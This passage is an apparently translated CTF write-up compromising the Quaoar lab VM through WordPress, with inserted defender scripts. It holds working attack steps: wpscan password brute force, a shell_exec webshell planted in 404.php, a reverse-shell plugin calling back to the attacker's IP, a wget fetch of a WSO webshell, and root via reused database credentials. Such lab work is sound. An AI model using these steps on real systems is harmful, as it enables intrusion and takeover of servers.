which prints,
Disallow: Hackers
Allow: /wordpress/
#   ____
#  /___ \_   _  __ _  ___   __ _ _ __
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |
#\___,_\ \__,_|\__,_|\___/ \__,_|_|
Access /upload
http://192.168.0.122/upload/
There is a LEPTON CMS here, but it is hard to reach because it references the IP 192.168.0.190. It seems better to focus on WordPress instead.
Wordpress Scanning
Scan WordPress,
wpscan --url http://192.168.0.122/wordpress --enumerate u
the result,
_______________________________________________________________
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.122/wordpress/ [192.168.0.122]
[+] Started: Mon Jan 23 21:45:40 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.122/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.122/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.122/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.122/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.122/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://192.168.0.122/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wpuser
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 21:45:46 2023
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 15.813 KB
[+] Data Received: 231.31 KB
[+] Memory used: 186.273 MB
[+] Elapsed time: 00:00:05
What was found,
What                  Fact
/readme.html          WordPress version 3.9.14
/wp-content/uploads/  Upload directory has directory listing enabled
Users found,
Id  Login   Name
1   admin   admin
2   wpuser  wpuser
WordPress Password Bruteforce
Try a bruteforce,
wpscan --url http://192.168.0.122/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 50
after a while, the result,
.........
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin
All Found
Progress Time: 00:01:41 <      > (40 / 28688) 0.13%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 21:55:08 2023
[+] Requests Done: 185
[+] Cached Requests: 39
[+] Data Sent: 52.958 KB
[+] Data Received: 4.135 MB
[+] Memory used: 338.531 MB
[+] Elapsed time: 00:01:58
So the credentials are
username admin, password admin
Command injection via the theme editor
Try logging in at
http://192.168.0.122/wordpress/wp-login.php
Go to
Appearance > Editor > 404 Template (404.php)
Enter
<?php
/**
 * The template for displaying 404 pages (Not Found)
 *
 * @package WordPress
 * @subpackage Twenty_Fourteen
 * @since Twenty Fourteen 1.0
 */
echo "<pre>";
echo shell_exec($_GET['cmd']);
echo "</pre>";
exit();
get_header();
?>
Don't forget to Save after adding it. Perform the command injection through the URL,
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id
If it works, the output will be,
/var/www/wordpress/wp-content/themes/twentyfourteen
total 864K
drwxr-xr-x 9 www-data www-data 4.0K Oct 12  2016 .
drwxr-xr-x 5 www-data www-data 4.0K Oct 16  2016 ..
-rw-r--r-- 1 www-data www-data  823 Jan 23 22:30 404.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 archive.php
-rw-r--r-- 1 www-data www-data 1.9K Oct 12  2016 author.php
-rw-r--r-- 1 www-data www-data 1.5K Oct 12  2016 category.php
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 comments.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-aside.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-audio.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 content-featured-post.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-gallery.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-image.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-link.php
-rw-r--r-- 1 www-data www-data  961 Oct 12  2016 content-none.php
-rw-r--r-- 1 www-data www-data  871 Oct 12  2016 content-page.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-quote.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-video.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 css
-rw-r--r-- 1 www-data www-data  946 Oct 12  2016 featured-content.php
-rw-r--r-- 1 www-data www-data  728 Oct 12  2016 footer.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 functions.php
drwxr-xr-x 3 www-data www-data 4.0K Oct 12  2016 genericons
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 header.php
-rw-r--r-- 1 www-data www-data 2.6K Oct 12  2016 image.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 images
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 inc
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 js
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 languages
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 page-templates
-rw-r--r-- 1 www-data www-data 1.2K Oct 12  2016 page.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 rtl.css
-rw-r--r-- 1 www-data www-data 603K Oct 12  2016 screenshot.png
-rw-r--r-- 1 www-data www-data 1.3K Oct 12  2016 search.php
-rw-r--r-- 1 www-data www-data  340 Oct 12  2016 sidebar-content.php
-rw-r--r-- 1 www-data www-data  395 Oct 12  2016 sidebar-footer.php
-rw-r--r-- 1 www-data www-data  848 Oct 12  2016 sidebar.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 single.php
-rw-r--r-- 1 www-data www-data  74K Oct 12  2016 style.css
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 tag.php
-rw-r--r-- 1 www-data www-data 2.4K Oct 12  2016 taxonomy-post_format.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
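As an added defender-side example (not part of the original walkthrough), the following Python script shows how the backdoored 404.php above would be caught on the web server: it flags theme PHP files that feed a request superglobal straight into a command sink, flags files whose mtime is out of line with the rest of the theme (note 404.php's Jan 23 22:30 against Oct 12 2016 for every other file in the listing), and checks whether wp-config.php sets DISALLOW_FILE_EDIT, which removes the Appearance > Editor used here. The mini theme it builds is a constructed fixture, and every function name is mine.

```python
"""Triage for the theme-editor backdoor shown in the walkthrough (added example).

Signals that the modified 404.php gives away:
  1. its source passes a request superglobal into a command sink
     (shell_exec($_GET['cmd']));
  2. its mtime is far newer than the rest of the theme.
Preventive check: wp-config.php should define DISALLOW_FILE_EDIT, which
removes the dashboard theme/plugin editor entirely.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Command-execution / code-evaluation sinks whose first argument is a
# request superglobal, e.g. shell_exec($_GET['cmd']).
SINKS = r"(?:shell_exec|system|exec|passthru|popen|proc_open|eval|assert)"
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
SINK_RE = re.compile(SINKS + r"\s*\(\s*" + SUPERGLOBALS, re.IGNORECASE)

DISALLOW_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE)


def find_request_to_sink(php_source: str) -> list:
    """Return each sink call that takes a request superglobal as its argument."""
    return [m.group(0) for m in SINK_RE.finditer(php_source)]


def mtime_outliers(theme_dir: Path, window_days: int = 30) -> list:
    """Names of files modified more than window_days after the theme's median mtime.

    A theme installed from a package has near-uniform timestamps; one file
    edited through the dashboard stands out, as 404.php did on Quaoar."""
    files = [p for p in theme_dir.rglob("*") if p.is_file()]
    if not files:
        return []
    mtimes = sorted(p.stat().st_mtime for p in files)
    limit = mtimes[len(mtimes) // 2] + window_days * 86400
    return sorted(p.name for p in files if p.stat().st_mtime > limit)


def file_edit_disabled(wp_config_source: str) -> bool:
    """True when wp-config.php turns the dashboard theme/plugin editor off."""
    return bool(DISALLOW_RE.search(wp_config_source))


def triage_theme(theme_dir: Path) -> dict:
    """Per-file report for PHP files that hit either signal."""
    outliers = set(mtime_outliers(theme_dir))
    report = {}
    for p in sorted(theme_dir.rglob("*.php")):
        hits = find_request_to_sink(p.read_text(errors="replace"))
        if hits or p.name in outliers:
            report[p.name] = {"sinks": hits, "mtime_outlier": p.name in outliers}
    return report


# Constructed fixture (not the real Quaoar filesystem): a mini theme in which
# 404.php carries the backdoor from the walkthrough and a fresh timestamp.
BACKDOOR_404 = ('<?php\necho "<pre>"; echo shell_exec($_GET[\'cmd\']); '
                'echo "</pre>";\nexit();\nget_header(); ?>\n')
BENIGN_PHP = "<?php get_header(); get_template_part('content'); get_footer(); ?>\n"


def build_fixture() -> Path:
    """Create a temp theme dir: five files dated Oct 12 2016, 404.php dated now."""
    root = Path(tempfile.mkdtemp(prefix="twentyfourteen_"))
    old = time.mktime((2016, 10, 12, 0, 0, 0, 0, 0, -1))
    for name in ("index.php", "header.php", "footer.php", "functions.php", "style.css"):
        f = root / name
        f.write_text(BENIGN_PHP if name.endswith(".php")
                     else "/* Theme Name: Twenty Fourteen */\n")
        os.utime(f, (old, old))
    (root / "404.php").write_text(BACKDOOR_404)  # mtime stays "now": the outlier
    return root


if __name__ == "__main__":
    theme = build_fixture()
    for name, info in triage_theme(theme).items():
        print(f"{name}: sinks={info['sinks']} mtime_outlier={info['mtime_outlier']}")
    print("DISALLOW_FILE_EDIT set:",
          file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
```

Run against a real install as `triage_theme(Path('/var/www/wordpress/wp-content/themes/twentyfourteen'))`; the same two signals apply to a dropped plugin file under wp-content/plugins/.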
Alternative: Inject a Fake Plugin
On Kali Linux
cd ~
cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php
Give it a plugin wrapper
<?php
/*
Plugin Name: Shelly
Plugin URI: http://localhost
Description: Bla Bla Bla
Author: Pingmoose
Version: 1.0.1
Author URI: http://localhost
*/
COPY CONTENTS OF shelly.php HERE
?>
In the Kali shell, check the IP address
ifconfig eth0
For example, the IP address is 192.168.0.94. Edit shelly.php and change
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
to
$ip = '192.168.0.94'; // CHANGE THIS
$port = 4444; // CHANGE THIS
Zip it,
zip shelly-plugin.zip shelly.php
mv shelly-plugin.zip /home/kali
chmod -Rf 777 /home/kali/shelly-plugin.zip
chown kali: /home/kali/shelly-plugin.zip
Go to
http://192.168.0.122/wordpress/wp-admin/plugins.php
Upload it, but DO NOT activate it.
Start a netcat listener on Kali on port 4444
nc -nvlp 4444
Trigger the shelly shell
http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php
On the Kali Linux CLI the following will appear,
nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 21:23:43 up  1:10,  0 users,  load average: 0.00, 0.01, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Upgrade to a fuller shell,
$ whoami
www-data
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Quaoar:/$
Get the first flag,
www-data@Quaoar:/$ cd /home
cd /home
www-data@Quaoar:/home$ ls
ls
wpadmin
www-data@Quaoar:/home$ cat wpadmin
cat wpadmin
cat: wpadmin: Is a directory
www-data@Quaoar:/home$ cd wpadmin
cd wpadmin
www-data@Quaoar:/home/wpadmin$ ls
ls
flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/home/wpadmin$
Hunting Flag 2: Root
Check,
cd /
find / -perm -4000 -user root 2> /dev/null
Nothing looks particularly interesting. Check wp-config.php,
cat /var/www/wordpress/wp-config.php
The result,
.....
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
.....
DB_PASSWORD rootpassword! - Nice! Try it,
www-data@Quaoar:/$ su
su
Password: rootpassword!
root@Quaoar:/#
We're in :) .. Root flag
root@Quaoar:/# cd /root
cd /root
root@Quaoar:~# ls -al
ls -al
total 48
drwx------  6 root root 4096 Nov 30  2016 .
drwxr-xr-x 22 root root 4096 Oct  7  2016 ..
drwx------  2 root root 4096 Oct  7  2016 .aptitude
-rw-------  1 root root  410 Jan 24 04:38 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Oct 15  2016 .cache
----------  1 root root   33 Oct 22  2016 flag.txt
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Oct 26  2016 .ssh
-rw-------  1 root root 4740 Nov 30  2016 .viminfo
drwxr-xr-x  8 root root 4096 Jan 29  2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#
The root flag is
8e3f9ec016e3598c5eec11fd3d73f6fb
Hunting Flag 3: Post-exploitation (as root)
Check /etc. /etc/cron.d/php5 looks interesting. Run,
root@Quaoar:~# cd /etc
cd /etc
root@Quaoar:/etc# ls *cron*
ls *cron*
crontab

cron.d:
php5

cron.daily:
apache2  bsdmainutils  man-db  samba  apport  dpkg  mlocate  standard  apt  libvirt-bin  passwd  tomcat6  aptitude  logrotate  popularity-contest  update-notifier-common

cron.hourly:

cron.monthly:

cron.weekly:
apt-xapian-index  man-db
root@Quaoar:/etc# cat cron.d/php5
cat cron.d/php5
# /etc/cron.d/php5: crontab fragment for php5
#  This purges session files older than X, where X is defined in seconds
#  as the largest value of session.gc_maxlifetime from all your php.ini
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de

# Look for and purge old sessions every 30 minutes
09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete
root@Quaoar:/etc#
The flag is,
d46795f84148fd338603d0d6a9dbf8de
Beberapa Catatan Percobaan Sebelumnya
Percobaan Privilege Escalation (getting root)
cara-cara di atas semua tidak berhasil. Terpaksa menggunakan bruteforce.
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20/var/www/wordpress http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20/var/www/wordpress/wp-config.php
Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.
Akhirnya saya coba iseng melihat konfigurasi wordpress, siapa tau password rootnya adalah password database server
 // ** MySQL settings - You can get this info from your web host ** //
 /** The name of the database for WordPress */
 define('DB_NAME', 'wordpress');
 /** MySQL database username */
 define('DB_USER', 'root');
 /** MySQL database password */
 define('DB_PASSWORD', 'rootpassword!');
 /** MySQL hostname */
 define('DB_HOST', 'localhost');
So I simply tried the password rootpassword! for the root account.
Okay! It worked, we got there, yay!!!
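The `404.php?cmd=` URLs above are the attacker's view. From the defender's side the same activity stands out in the web server's access log: WordPress routes normal requests through index.php, so a direct GET to a PHP file under wp-content/themes/ carrying a shell command in a parameter is anomalous. The script below is an added example, not code from this walkthrough. It parses combined-format access-log lines, percent-decodes the query string and reports requests that hit theme/plugin PHP files, carry a `cmd`-style parameter or a shell-like value, or POST to the theme editor (the usual way such a backdoor is written into a theme file). The log lines are constructed: the three `cmd=` requests mirror the URLs used in this walkthrough, while the client IPs, timestamps, byte counts, the theme-editor POST and the parameter names other than `cmd` are assumptions.

```python
"""Flag webshell-style requests to WordPress theme files in access logs.

Added example for this walkthrough, not code from the original page. The
sample log lines are constructed: only the 404.php?cmd= requests mirror the
walkthrough's URLs; IPs, timestamps, sizes and the theme-editor POST are
assumptions."""
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Apache/Nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Direct hits on PHP files under themes/ or plugins/. WordPress routes normal
# traffic through index.php, so these are rare outside of admin tooling.
THEME_PHP_RE = re.compile(r"/wp-content/(?:themes|plugins)/[^/]+/.*\.php$")
# Parameter names used by one-line backdoors. Only "cmd" appears in the
# walkthrough; the others are an assumption added for coverage.
SUSPECT_PARAMS = {"cmd", "c", "exec", "command"}
# Values that look like a shell command rather than a slug, id or nonce.
SHELL_VALUE_RE = re.compile(
    r"(?:^|[\s;|&`$(])(?:cat|ls|id|whoami|pwd|wget|curl|nc|bash|sh|python|php|mv|chmod|uname)\b"
    r"|/etc/|wp-config\.php|https?://"
)
THEME_EDITOR = "/wp-admin/theme-editor.php"


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qsl percent-decodes, so "cat%20/etc/passwd" is seen as "cat /etc/passwd".
    entry["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return entry


def reasons_for(entry: dict) -> list:
    """Detection reasons that apply to a parsed entry; an empty list means benign."""
    reasons = []
    if THEME_PHP_RE.search(entry["path"]):
        reasons.append("direct request to a theme/plugin PHP file")
    for name, value in entry["params"].items():
        if name in SUSPECT_PARAMS:
            reasons.append(f"command-style parameter {name}={value!r}")
        if SHELL_VALUE_RE.search(value):
            reasons.append(f"shell-like value in parameter {name}")
    if entry["method"] == "POST" and entry["path"].endswith(THEME_EDITOR):
        reasons.append("theme editor write (how a theme-file backdoor is usually planted)")
    return reasons


def scan(lines) -> list:
    """Parsed entries that triggered at least one reason, in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = reasons_for(entry)
        if reasons:
            entry["reasons"] = reasons
            findings.append(entry)
    return findings


# Constructed sample: three webshell requests, two benign requests, one theme-editor save.
SAMPLE_LOG = [
    '192.168.0.62 - - [26/Jan/2023:20:41:07 -0500] "GET /wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '192.168.0.62 - - [26/Jan/2023:20:41:19 -0500] "GET /wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20/var/www/wordpress/wp-config.php HTTP/1.1" 200 3212 "-" "Mozilla/5.0"',
    '192.168.0.10 - - [26/Jan/2023:20:42:03 -0500] "GET /wordpress/?p=1 HTTP/1.1" 200 9412 "-" "Mozilla/5.0"',
    '192.168.0.10 - - [26/Jan/2023:20:42:05 -0500] "GET /wordpress/wp-content/themes/twentyfourteen/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.168.0.62 - - [26/Jan/2023:20:52:03 -0500] "GET /wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.0.62 - - [26/Jan/2023:20:55:30 -0500] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://192.168.0.122/wordpress/wp-admin/theme-editor.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["target"]}')
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Feed it `open("/var/log/apache2/access.log")` instead of `SAMPLE_LOG` on a real server. The three `cmd=` requests each trigger all three request-level reasons, the theme-editor POST triggers one, and the two benign lines are dropped.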
Epilogue
Honestly, this VM is actually easy; the annoying part is playing with brute force and guessing passwords.
Of course, even though it is easy, it is still hard for those of you who are new to the hacking world. Password guessing is what I would call one of the "god-tier skills", because you need a good sense for it.
That's all for now, stay tuned for more articles! :D
References
Experiment Using the WSO Webshell
Upload the WSO Shell
Download WSO
 cd /home/kali/Downloads/
 wget https://github.com/mIcHyAmRaNe/wso-webshell/archive/refs/heads/master.zip
 unzip master.zip
 mv wso-webshell-master/wso.php .
 mv wso.php wso.txt
Default settings of this WSO shell:
* Password: ghost287 (edit line 7, stored as an MD5 hash)
* Email: test@testmail.com (edit line 4)
The wso.txt file is in /home/kali/Downloads/. Start a web server on Kali Linux:
python3 -m http.server --bind 0.0.0.0 9000
Check the IP address of the Kali Linux machine
ifconfig
Suppose the IP address is 192.168.0.62; check that it is reachable over the web at
 http://192.168.0.62:9000/
 http://192.168.0.62:9000/wso.txt
Upload it through the exploit (the cmd parameter of the planted 404.php). wget saves into the working directory of the PHP process, so the final ls -la confirms where wso.php landed:
 http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt
 http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv%20wso.txt%20wso.php
 http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20-la
Try the WSO Shell
Run the WSO shell's remote shell
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=php%20wso.php
On Kali Linux, run
nc -lvp 31337
The WSO shell does not appear to work yet.
WSO shell, for those who want to explore it. Time for the connect-back shell: just run nc -lvp 31337 and open the Network section. Enter your IP and you get a shell like this